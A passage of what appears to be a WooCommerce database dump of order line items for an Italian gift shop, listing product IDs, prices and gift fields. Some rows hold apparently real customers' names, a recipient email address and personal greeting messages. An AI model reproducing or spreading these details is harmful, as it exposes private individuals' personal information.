_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1347,145,'_product_id','435'),(1348,145,'_variation_id','0'),(1349,145,'_qty','1'),(1350,145,'_tax_class',''),(1351,145,'_line_subtotal','98'),(1352,145,'_line_subtotal_tax','0'),(1353,145,'_line_total','98'),(1354,145,'_line_tax','0'),(1355,145,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1356,145,'To','Angelo e Lara'),(1357,145,'From','Andrea, Giada, Luca e Claudio'),(1358,145,'Message','Buon Natale e grazie di tutto!!!'),(1359,145,'Delivery Method','Downloadable'),(1360,145,'Original Price','98'),(1361,146,'_product_id','211'),(1362,146,'_variation_id','0'),(1363,146,'_qty','1'),(1364,146,'_tax_class',''),(1365,146,'_line_subtotal','60'),(1366,146,'_line_subtotal_tax','0'),(1367,146,'_line_total','60'),(1368,146,'_line_tax','0'),(1369,146,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1370,147,'_product_id','216'),(1371,147,'_variation_id','0'),(1372,147,'_qty','1'),(1373,147,'_tax_class',''),(1374,147,'_line_subtotal','120'),(1375,147,'_line_subtotal_tax','0'),(1376,147,'_line_total','120'),(1377,147,'_line_tax','0'),(1378,147,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1397,150,'_product_id','216'),(1398,150,'_variation_id','0'),(1399,150,'_qty','1'),(1400,150,'_tax_class',''),(1401,150,'_line_subtotal','120'),(1402,150,'_line_subtotal_tax','0'),(1403,150,'_line_total','120'),(1404,150,'_line_tax','0'),(1405,150,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1406,151,'_product_id','220'),(1407,151,'_variation_id','0'),(1408,151,'_qty','1'),(1409,151,'_tax_class',''),(1410,151,'_line_subtotal','180'),(1411,151,'_line_subtotal_tax','0'),(1412,151,'_line_total','180'),(1413,151,'_line_tax','0'),(1414,151,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1415,152,'_product_id','211'),(1416,152,'_variation_id','0'),(1417,152,'_qty','1'),(1418,152,'_tax_class',''),(1419,152,'_line_subtotal','60'),(1420,152,'_line_subtotal_tax','0'),(1421,152,'_line_total','60'),(1422,152,'_line_tax','0'),(1423,152,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1424,153,'_product_id','472'),(1425,153,'_variation_id','0'),(1426,153,'_qty','1'),(1427,153,'_tax_class',''),(1428,153,'_line_subtotal','120'),(1429,153,'_line_subtotal_tax','0'),(1430,153,'_line_total','120'),(1431,153,'_line_tax','0'),(1432,153,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1433,153,'To','Siri.siri@libero.it'),(1434,153,'From','Sara, Marica e Aldo'),(1435,153,'Message','Tanti auguri di buon compleanno Beatrice e Raffaele .. Vi auguriamo di passare una bella serata !!'),(1436,153,'Delivery Method','Mail to recipient'),(1437,153,'Original Price','120'),(1438,154,'_product_id','472'),(1439,154,'_variation_id','0'),(1440,154,'_qty','1'),(1441,154,'_tax_class',''),(1442,154,'_line_subtotal','120'),(1443,154,'_line_subtotal_tax','0'),(1444,154,'_line_total','120'),(1445,154,'_line_tax','0'),(1446,154,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1447,154,'To','Siri.siri@libero.it'),(1448,154,'From','Sara, Marica , Aldo e Mattia '),(1449,154,'Message','Tanti auguri di buon compleanno a Beatrice e Raffaele..\r\nVi auguriamo di passare una bella serata .. Un abbraccio! '),(1450,154,'Delivery Method','Mail to recipient'),(1451,154,'Original Price','120'),(1452,155,'_product_id','288'),(1453,155,'_variation_id','0'),(1454,155,'_qty','1'),(1455,155,'_tax_class',''),(1456,155,'_line_subtotal','60'),(1457,155,'_line_subtotal_tax','0'),(1458,155,'_line_total','60'),(1459,155,'_line_tax','0'),(1460,155,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1461,156,'_product_id','288'),(1462,156,'_variation_id','0'),(1463,156,'_qty','1'),(1464,156,'_tax_class',''),(1465,156,'_line_subtotal','60'),(1466,156,'_line_subtotal_tax','0'),(1467,156,'_line_total','60'),(1468,156,'_line_tax','0'),(1469,156,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1470,157,'_product_id','290'),(1471,157,'_variation_id','0'),(1472,157,'_qty','1'),(1473,157,'_tax_class',''),(1474,157,'_line_subtotal','120'),(1475,157,'_line_subtotal_tax','0'),(1476,157,'_line_total','120'),(1477,157,'_line_tax','0'),(1478,157,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1479,158,'_product_id','288'),(1480,158,'_variation_id','0'),(1481,158,'_qty','1'),(1482,158,'_tax_class',''),(1483,158,'_line_subtotal','60'),(1484,158,'_line_subtotal_tax','0'),(1485,158,'_line_total','60'),(1486,158,'_line_tax','0'),(1487,158,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1488,159,'_product_id','288'),(1489,159,'_variation_id','0'),(1490,159,'_qty','1'),(1491,159,'_tax_class',''),(1492,159,'_line_subtotal','60'),(1493,159,'_line_subtotal_tax','0'),(1494,159,'_line_total','60'),(1495,159,'_line_tax','0'),(1496,159,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1497,160,'_product_id','288'),(1498,160,'_variation_id','0'),(1499,160,'_qty','1'),(1500,160,'_tax_class',''),(1501,160,'_line_subtotal','60'),(1502,160,'_line_subtotal_tax','0'),(1503,160,'_line_total','60'),(1504,160,'_line_tax','0'),(1505,160,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1506,161,'_product_id','288'),(1507,161,'_variation_id','0'),(1508,161,'_qty','1'),(1509,161,'_tax_class',''),(1510,161,'_line_subtotal','60'),(1511,161,'_line_subtotal_tax','0'),(1512,161,'_line_total','60'),(1513,161,'_line_tax','0'),(1514,161,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1515,162,'_product_id','288'),(1516,162,'_variation_id','0'),(1517,162,'_qty','1'),(1518,162,'_tax_class',''),(1519,162,'_line_subtotal','60'),(1520,162,'_line_subtotal_tax','0'),(1521,162,'_line_total','60'),(1522,162,'_line_tax','0'),(1523,162,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1524,163,'_product_id','288'),(1525,163,'_variation_id','0'),(1526,163,'_qty','1'),(1527,163,'_tax_class',''),(1528,163,'_line_subtotal','60'),(1529,163,'_line_subtotal_tax','0'),(1530,163,'_line_total','60'),(1531,163,'_line_tax','0'),(1532,163,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1533,164,'_product_id','288'),(1534,164,'_variation_id','0'),(1535,164,'_qty','1'),(1536,164,'_tax_class',''),(1537,164,'_line_subtotal','60'),(1538,164,'_line_subtotal_tax','0'),(1539,164,'_line_total','60'),(1540,164,'_line_tax','0'),(1541,164,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1542,165,'_product_id','288'),(1543,165,'_variation_id','0'),(1544,165,'_qty','1'),(1545,165,'_tax_class',''),(1546,165,'_line_subtotal','60'),(1547,165,'_line_subtotal_tax','0'),(1548,165,'_line_total','60'),(1549,165,'_line_tax','0'),(1550,165,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1560,167,'_product_id','288'),(1561,167,'_variation_id','0'),(1562,167,'_qty','1'),(1563,167,'_tax_class',''),(1564,167,'_line_subtotal','60'),(1565,167,'_line_subtotal_tax','0'),(1566,167,'_line_total','60'),(1567,167,'_line_tax','0'),(1568,167,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1569,168,'_product_id','288'),(1570,168,'_variation_id','0'),(1571,168,'_qty','1'),(1572,168,'_tax_class',''),(1573,168,'_line_subtotal','60'),(1574,168,'_line_subtotal_tax','0'),(1575,168,'_line_total','60'),(1576,168,'_line_tax','0'),(1577,168,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1578,169,'_product_id','288'),(1579,169,'_variation_id','0'),(1580,169,'_qty','1'),(1581,169,'_tax_class',''),(1582,169,'_line_subtotal','60'),(1583,169,'_line_subtotal_tax','0'),(1584,169,'_line_total','60'),(1585,169,'_line_tax','0'),(1586,169,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1587,170,'_product_id','288'),(1588,170,'_variation_id','0'),(1589,170,'_qty','1'),(1590,170,'_tax_class',''),(1591,170,'_line_subtotal','60'),(1592,170,'_line_subtotal_tax','0'),(1593,170,'_line_total','60'),(1594,170,'_line_tax','0'),(1595,170,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1596,171,'_product_id','288'),(1597,171,'_variation_id','0'),(1598,171,'_qty','1'),(1599,171,'_tax_class',''),(1600,171,'_line_subtotal','60'),(1601,171,'_line_subtotal_tax','0'),(1602,171,'_line_total','60'),(1603,171,'_line_tax','0'),(1604,171,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1605,172,'_product_id','288'),(1606,172,'_variation_id','0'),(1607,172,'_qty','1'),(1608,172,'_tax_class',''),(1609,172,'_line_subtotal','60'),(1610,172,'_line_subtotal_tax','0'),(1611,172,'_line_total','60'),(1612,172,'_line_tax','0'),(1613,172,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1614,173,'_product_id','288'),(1615,173,'_variation_id','0'),(1616,173,'_qty','1'),(1617,173,'_tax_class',''),(1618,173,'_line_subtotal','60'),(1619,173,'_line_subtotal_tax','0'),(1620,173,'_line_total','60'),(1621,173,'_line_tax','0'),(1622,173,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1623,174,'_product_id','288'),(1624,174,'_variation_id','0'),(1625,174,'_qty','1'),(1626,174,'_tax_class',''),(1627,174,'_line_subtotal','60'),(1628,174,'_line_subtotal_tax','0'),(1629,174,'_line_total','60'),(1630,174,'_line_tax','0'),(1631,174,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1632,175,'_product_id','288'),(1633,175,'_variation_id','0'),(1634,175,'_qty','1'),(1635,175,'_tax_class',''),(1636,175,'_line_subtotal','60'),(1637,175,'_line_subtotal_tax','0'),(1638,175,'_line_total','60'),(1639,175,'_line_tax','0'),(1640,175,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1650,177,'_product_id','288'),(1651,177,'_variation_id','0'),(1652,177,'_qty','1'),(1653,177,'_tax_class',''),(1654,177,'_line_subtotal','60'),(1655,177,'_line_subtotal_tax','0'),(1656,177,'_line_total','60'),(1657,177,'_line_tax','0'),(1658,177,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1659,178,'_product_id','548'),(1660,178,'_variation_id','0'),(1661,178,'_qty','1'),(1662,178,'_tax_class',''),(1663,178,'_line_subtotal','100'),(1664,178,'_line_subtotal_tax','0'),(1665,178,'_line_total','100'),(1666,178,'_line_tax','0'),(1667,178,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1668,178,'To','Pecchi Maurizio '),(1669,178,'From','Elena Cocozza'),(1670,178,'Message','Per questo tuo 56 compleanno ho pensato di sorprenderti fino in fondo....sei la mia vita e mi rendi felice ogni giorno....Tantissimi auguri di buon compleanno amore mio!!! La tua Topina!!! '),(1671,178,'Delivery Method','Downloadable'),(1672,178,'Original Price','100'),(1673,179,'_product_id','324'),(1674,179,'_variation_id','0'),(1675,179,'_qty','1'),(1676,179,'_tax_class',''),(1677,179,'_line_subtotal','100'),(1678,179,'_line_subtotal_tax','0'),(1679,179,'_line_total','100'),(1680,179,'_line_tax','0'),(1681,179,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1682,180,'_product_id','324'),(1683,180,'_variation_id','0'),(1684,180,'_qty','1'),(1685,180,'_tax_class',''),(1686,180,'_line_subtotal','100'),(1687,180,'_line_subtotal_tax','0'),(1688,180,'_line_total','100'),(1689,180,'_line_tax','0'),(1690,180,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1691,181,'_product_id','324'),(1692,181,'_variation_id','0'),(1693,181,'_qty','1'),(1694,181,'_tax_class',''),(1695,181,'_line_subtotal','100'),(1696,181,'_line_subtotal_tax','0'),(1697,181,'_line_total','100'),(1698,181,'_line_tax','0'),(1699,181,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1700,182,'_product_id','324'),(1701,182,'_variation_id','0'),(1702,182,'_qty','1'),(1703,182,'_tax_class',''),(1704,182,'_line_subtotal','100'),(1705,182,'_line_subtotal_tax','0'),(1706,182,'_line_total','100'),(1707,182,'_line_tax','0'),(1708,182,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1709,183,'_product_id','324'),(1710,183,'_variation_id','0'),(1711,183,'_qty','1'),(1712,183,'_tax_class',''),(1713,183,'_line_subtotal','100'),(1714,183,'_line_subtotal_tax','0'),(1715,183,'_line_total','100'),(1716,183,'_line_tax','0'),(1717,183,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1718,184,'_product_id','329'),(1719,184,'_variation_id','0'),(1720,184,'_qty','1'),(1721,184,'_tax_class',''),(1722,184,'_line_subtotal','100'),(1723,184,'_line_subtotal_tax','0'),(1724,184,'_line_total','100'),(1725,184,'_line_tax','0'),(1726,184,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1727,185,'_product_id','327'),(1728,185,'_variation_id','0'),(1729,185,'_qty','1'),(1730,185,'_tax_class',''),(1731,185,'_line_subtotal','50'),(1732,185,'_line_subtotal_tax','0'),(1733,185,'_line_total','50'),(1734,185,'_line_tax','0'),(1735,185,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1736,186,'_product_id','327'),(1737,186,'_variation_id','0'),(1738,186,'_qty','1'),(1739,186,'_tax_class',''),(1740,186,'_line_subtotal','50'),(1741,186,'_line_subtotal_tax','0'),(1742,186,'_line_total','50'),(1743,186,'_line_tax','0'),(1744,186,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1745,187,'_product_id','630'),(1746,187,'_variation_id','0'),(1747,187,'_qty','1'),(1748,187,'_tax_class',''),(1749,187,'_line_subtotal','150'),(1750,187,'_line_subtotal_tax','0'),(1751,187,'_line_total','150'),(1752,187,'_line_tax','0'),(1753,187,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1754,188,'_product_id','630'),(1755,188,'_variation_id','0'),(1756,188,'_qty','1'),(1757,188,'_tax_class',''),(1758,188,'_line_subtotal','150'),(1759,188,'_line_subtotal_tax','0'),(1760,188,'_line_total','150'),(1761,188,'_line_tax','0'),(1762,188,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1763,189,'_product_id','322'),(1764,189,'_variation_id','0'),(1765,189,'_qty','1'),(1766,189,'_tax_class',''),(1767,189,'_line_subtotal','50'),(1768,189,'_line_subtotal_tax','0'),(1769,189,'_line_total','50'),(1770,189,'_line_tax','0'),(1771,189,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1772,190,'_product_id','327'),(1773,190,'_variation_id','0'),(1774,190,'_qty','1'),(1775,190,'_tax_class',''),(1776,190,'_line_subtotal','50'),(1777,190,'_line_subtotal_tax','0'),(1778,190,'_line_total','50'),(1779,190,'_line_tax','0'),(1780,190,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1781,191,'_product_id','324'),(1782,191,'_variation_id','0'),(1783,191,'_qty','1'),(1784,191,'_tax_class',''),(1785,191,'_line_subtotal','100'),(1786,191,'_line_subtotal_tax','0'),(1787,191,'_line_total','100'),(1788,191,'_line_tax','0'),(1789,191,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1790,192,'_product_id','322'),(1791,192,'_variation_id','0'),(1792,192,'_qty','1'),(1793,192,'_tax_class',''),(1794,192,'_line_subtotal','50'),(1795,192,'_line_subtotal_tax','0'),(1796,192,'_line_total','50'),(1797,192,'_line_tax','0'),(1798,192,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1799,193,'_product_id','630'),(1800,193,'_variation_id','0'),(1801,193,'_qty','1'),(1802,193,'_tax_class',''),(1803,193,'_line_subtotal','150'),(1804,193,'_line_subtotal_tax','0'),(1805,193,'_line_total','150'),(1806,193,'_line_tax','0'),(1807,193,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1808,194,'_product_id','435'),(1809,194,'_variation_id','0'),(1810,194,'_qty','1'),(1811,194,'_tax_class',''),(1812,194,'_line_subtotal','98'),(1813,194,'_line_subtotal_tax','0'),(1814,194,'_line_total','98'),(1815,194,'_line_tax','0'),(1816,194,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1817,194,'To','MARTINO'),(1818,194,'From','VIRGINIA'),(1819,194,'Message','PER UNA SERATA SPECIALE, SOLO PER NOI!'),(1820,194,'Delivery Method','Downloadable'),(1821,194,'Original Price','98'),(1831,196,'_product_id','322'),(1832,196,'_variation_id','0'),(1833,196,'_qty','1'),(1834,196,'_tax_class',''),(1835,196,'_line_subtotal','50'),(1836,196,'_line_subtotal_tax','0'),(1837,196,'_line_total','50'),(1838,196,'_line_tax','0'),(1839,196,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1840,197,'_product_id','322'),(1841,197,'_variation_id','0'),(1842,197,'_qty','1'),(1843,197,'_tax_class',''),(1844,197,'_line_subtotal','50'),(1845,197,'_line_subtotal_tax','0'),(1846,197,'_line_total','50'),(1847,197,'_line_tax','0'),(1848,197,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1849,198,'_product_id','331'),(1850,198,'_variation_id','0'),(1851,198,'_qty','1'),(1852,198,'_tax_class',''),(1853,198,'_line_subtotal','150'),(1854,198,'_line_subtotal_tax','0'),(1855,198,'_line_total','150'),(1856,198,'_line_tax','0'),(1857,198,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1858,199,'_product_id','324'),(1859,199,'_variation_id','0'),(1860,199,'_qty','1'),(1861,199,'_tax_class',''),(1862,199,'_line_subtotal','100'),(1863,199,'_line_subtotal_tax','0'),(1864,199,'_line_total','100'),(1865,199,'_line_tax','0'),(1866,199,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1867,200,'_product_id','472'),(1868,200,'_variation_id','0'),(1869,200,'_qty','1'),(1870,200,'_tax_class',''),(1871,200,'_line_subtotal','120'),(1872,200,'_line_subtotal_tax','0'),(1873,200,'_line_total','120'),(1874,200,'_line_tax','0'),(1875,200,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1876,200,'To','Lavinia'),(1877,200,'From','Lau, Monty, Eli, Tommi e Nenni'),(1878,200,'Message','Uno non puo\' \r\nPensare bene,\r\nAmare bene,\r\nDormire bene\r\nse non ha \r\nMangiato bene!\r\n\r\nTanto auguri piccola dolce Lavi da tutti Noi.\r\nTi vogliamo tanto bene\r\n'),(1879,200,'Delivery Method','Downloadable'),(1880,200,'Original Price','120'),(1881,201,'_product_id','322'),(1882,201,'_variation_id','0'),(1883,201,'_qty','1'),(1884,201,'_tax_class',''),(1885,201,'_line_subtotal','50'),(1886,201,'_line_subtotal_tax','0'),(1887,201,'_line_total','50'),(1888,201,'_line_tax','0'),(1889,201,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1890,202,'_product_id','322'),(1891,202,'_variation_id','0'),(1892,202,'_qty','1'),(1893,202,'_tax_class',''),(1894,202,'_line_subtotal','50'),(1895,202,'_line_subtotal_tax','0'),(1896,202,'_line_total','50'),(1897,202,'_line_tax','0'),(1898,202,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1899,203,'_product_id','324'),(1900,203,'_variation_id','0'),(1901,203,'_qty','1'),(1902,203,'_tax_class',''),(1903,203,'_line_subtotal','100'),(1904,203,'_line_subtotal_tax','0'),(1905,203,'_line_total','100'),(1906,203,'_line_tax','0'),(1907,203,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1926,206,'_product_id','322'),(1927,206,'_variation_id','0'),(1928,206,'_qty','1'),(1929,206,'_tax_class',''),(1930,206,'_line_subtotal','50'),(1931,206,'_line_subtotal_tax','0'),(1932,206,'_line_total','50'),(1933,206,'_line_tax','0'),(1934,206,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1935,207,'_product_id','327'),(1936,207,'_variation_id','0'),(1937,207,'_qty','1'),(1938,207,'_tax_class',''),(1939,207,'_line_subtotal','50'),(1940,207,'_line_subtotal_tax','0'),(1941,207,'_line_total','50'),(1942,207,'_line_tax','0'),(1943,207,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1944,208,'_product_id','327'),(1945,208,'_variation_id','0'),(1946,208,'_qty','1'),(1947,208,'_tax_class',''),(1948,208,'_line_subtotal','50'),(1949,208,'_line_subtotal_tax','0'),(1950,208,'_line_total','50'),(1951,208,'_line_tax','0'),(1952,208,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1962,210,'_product_id','327'),(1963,210,'_variation_id','0'),(1964,210,'_qty','1'),(1965,210,'_tax_class',''),(1966,210,'_line_subtotal','50'),(1967,210,'_line_subtotal_tax','0'),(1968,210,'_line_total','50'),(1969,210,'_line_tax','0'),(1970,210,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1980,212,'_product_id','327'),(1981,212,'_variation_id','0'),(1982,212,'_qty','1'),(1983,212,'_tax_class',''),(1984,212,'_line_subtotal','50'),(1985,212,'_line_subtotal_tax','0'),(1986,212,'_line_total','50'),(1987,212,'_line_tax','0'),(1988,212,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1989,213,'_product_id','333'),(1990,213,'_variation_id','0'),(1991,213,'_qty','1'),(1992,213,'_tax_class',''),(1993,213,'_line_subtotal','175'),(1994,213,'_line_subtotal_tax','0'),(1995,213,'_line_total','175'),(1996,213,'_line_tax','0'),(1997,213,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1998,214,'_product_id','337'),(1999,214,'_variation_id','0'),(2000,214,'_qty','1'),(2001,214,'_tax_class',''),(2002,214,'_line_subtotal','125'),(2003,214,'_line_subtotal_tax','0'),(2004,214,'_line_total','125'),(2005,214,'_line_tax','0'),(2006,214,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2007,215,'_product_id','331'),(2008,215,'_variation_id','0'),(2009,215,'_qty','1'),(2010,215,'_tax_class',''),(2011,215,'_line_subtotal','150'),(2012,215,'_line_subtotal_tax','0'),(2013,215,'_line_total','150'),(2014,215,'_line_tax','0'),(2015,215,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2025,217,'_product_id','323'),(2026,217,'_variation_id','0'),(2027,217,'_qty','1'),(2028,217,'_tax_class',''),(2029,217,'_line_subtotal','75'),(2030,217,'_line_subtotal_tax','0'),(2031,217,'_line_total','75'),(2032,217,'_line_tax','0'),(2033,217,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2034,218,'_product_id','324'),(2035,218,'_variation_id','0'),(2036,218,'_qty','1'),(2037,218,'_tax_class',''),(2038,218,'_line_subtotal','100'),(2039,218,'_line_subtotal_tax','0'),(2040,218,'_line_total','100'),(2041,218,'_line_tax','0'),(2042,218,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2052,220,'_product_id','331'),(2053,220,'_variation_id','0'),(2054,220,'_qty','1'),(2055,220,'_tax_class',''),(2056,220,'_line_subtotal','150'),(2057,220,'_line_subtotal_tax','0'),(2058,220,'_line_total','150'),(2059,220,'_line_tax','0'),(2060,220,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2061,221,'_product_id','329'),(2062,221,'_variation_id','0'),(2063,221,'_qty','1'),(2064,221,'_tax_class',''),(2065,221,'_line_subtotal','100'),(2066,221,'_line_subtotal_tax','0'),(2067,221,'_line_total','100'),(2068,221,'_line_tax','0'),(2069,221,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2070,222,'_product_id','327'),(2071,222,'_variation_id','0'),(2072,222,'_qty','1'),(2073,222,'_tax_class',''),(2074,222,'_line_subtotal','50'),(2075,222,'_line_subtotal_tax','0'),(2076,222,'_line_total','50'),(2077,222,'_line_tax','0'),(2078,222,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2079,223,'_product_id','327'),(2080,223,'_variation_id','0'),(2081,223,'_qty','1'),(2082,223,'_tax_class',''),(2083,223,'_line_subtotal','50'),(2084,223,'_line_subtotal_tax','0'),(2085,223,'_line_total','50'),(2086,223,'_line_tax','0'),(2087,223,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2088,224,'_product_id','327'),(2089,224,'_variation_id','0'),(2090,224,'_qty','1'),(2091,224,'_tax_class',''),(2092,224,'_line_subtotal','50'),(2093,224,'_line_subtotal_tax','0'),(2094,224,'_line_total','50'),(2095,224,'_line_tax','0'),(2096,224,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2097,225,'_product_id','324'),(2098,225,'_variation_id','0'),(2099,225,'_qty','1'),(2100,225,'_tax_class',''),(2101,225,'_line_subtotal','100'),(2102,225,'_line_subtotal_tax','0'),(2103,225,'_line_total','100'),(2104,225,'_line_tax','0'),(2105,225,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2106,226,'_product_id','337'),(2107,226,'_variation_id','0'),(2108,226,'_qty','1'),(2109,226,'_tax_class',''),(2110,226,'_line_subtotal','125'),(2111,226,'_line_subtotal_tax','0'),(2112,226,'_line_total','125'),(2113,226,'_line_tax','0'),(2114,226,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2115,227,'_product_id','329'),(2116,227,'_variation_id','0'),(2117,227,'_qty','1'),(2118,227,'_tax_class',''),(2119,227,'_line_subtotal','100'),(2120,227,'_line_subtotal_tax','0'),(2121,227,'_line_total','100'),(2122,227,'_line_tax','0'),(2123,227,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2124,228,'_product_id','329'),(2125,228,'_variation_id','0'),(2126,228,'_qty','1'),(2127,228,'_tax_class',''),(2128,228,'_line_subtotal','100'),(2129,228,'_line_subtotal_tax','0'),(2130,228,'_line_total','100'),(2131,228,'_line_tax','0'),(2132,228,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2133,229,'_product_id','328'),(2134,229,'_variation_id','0'),(2135,229,'_qty','1'),(2136,229,'_tax_class',''),(2137,229,'_line_subtotal','75'),(2138,229,'_line_subtotal_tax','0'),(2139,229,'_line_total','75'),(2140,229,'_line_tax','0'),(2141,229,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2142,230,'_product_id','328'),(2143,230,'_variation_id','0'),(2144,230,'_qty','1'),(2145,230,'_tax_class',''),(2146,230,'_line_subtotal','75'),(2147,230,'_line_subtotal_tax','0'),(2148,230,'_line_total','75'),(2149,230,'_line_tax','0'),(2150,230,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2151,231,'_product_id','328'),(2152,231,'_variation_id','0'),(2153,231,'_qty','1'),(2154,231,'_tax_class',''),(2155,231,'_line_subtotal','75'),(2156,231,'_line_subtotal_tax','0'),(2157,231,'